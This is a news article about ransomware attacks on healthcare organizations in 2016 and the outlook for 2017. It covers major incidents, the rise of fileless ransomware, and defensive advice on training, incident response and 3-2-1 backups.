Share this article on:
Over the past two years, ransomware has grown to become one of the biggest cybersecurity threats. While most infections are random, the healthcare industry has been targeted in 2016 and the outlook for 2017 remains bleak.
Many healthcare organizations attacked with ransomware have been able to make a full recovery by deleting systems and reconstituting data from backups. However, there have been numerous cases over the past 12 months when data restoration from backups has failed. In such cases, healthcare organizations are faced with two options: Accept data loss or pay the attackers for the keys to unlock the encryption. In February, Hollywood Presbyterian Medical Center chose the latter, and paid the attackers $17,000 for the keys to unlock the encryption.
2016 saw major new ransomware variants unleashed, with Locky and Samas (Samsam) two of the biggest threats. Both ransomware variants have been used to attack healthcare providers in 2016, with the former reportedly used to in the HPMC attack and the latter reportedly used in a major attack on Medstar Health in March, 2016.
In October last year, MalwareHunterTeam reported that there are more than 200 distinct ransomware families, each containing a myriad of ransomware variants. In 2016, ransomware revenue surpassed the $1 billion milestone.
Ransomware variants are becoming much more sophisticated and use a wide variety of techniques for obfuscation to escape detection. Virulence is also increasing.
One of the latest developments is fileless ransomware. As CrowdStrike explains, with fileless ransomware “malicious code is either embedded in a native scripting language or written straight into memory using legitimate administrative tools such as PowerShell, without being written to disk.” Since no files are downloaded on to the victim’s computer, traditional signature-based detection systems fail to identify the threat.
Infographic Source: Crowdstrike
The fight against ransomware requires multilayered defenses and a host of technologies to prevent infection. Healthcare employees should be warned of the threat and ransomware should be covered in security awareness training. Basic security awareness can be effective at preventing some ransomware infections – Simple measures such as verifying email sources prior to clicking links and never opening attachments from unknown sources should be practices by all employees.
However, even with advanced ransomware defenses, organizations should be prepared to deal with an attack when one occurs. In addition to advanced detection technologies, policies and procedures should be developed specifically to cover ransomware infections to ensure the fastest possible response time. Rapid detection is essential if damage is to be limited.
There have been numerous cases where data have been encrypted, yet the attackers have been unable to supply valid keys to unlock the encryption. Even paying a ransom is no guarantee that it will be possible to unlock files. Recovery will hinge on whether files can be restored from backups.
To limit data loss, daily backups are essential. Backup data should be stored securely in the cloud and on air-gapped backup drives. As was demonstrated this week, cloud copies of files can also easily be encrypted. A nursing school in California – The Gurnick Academy – experienced a ransomware infection when an instructor inadvertently introduced ransomware via a USB drive. However, since Google Drive sync was running on his computer, the encrypted files were replicated in his Google Drive account.
When it comes to backups, organizations should practice the 3-2-1 rule. Three copies of data should exist. Those backups should be stored on two separate media, and one of those backup copies should be stored in a secure, off-site location.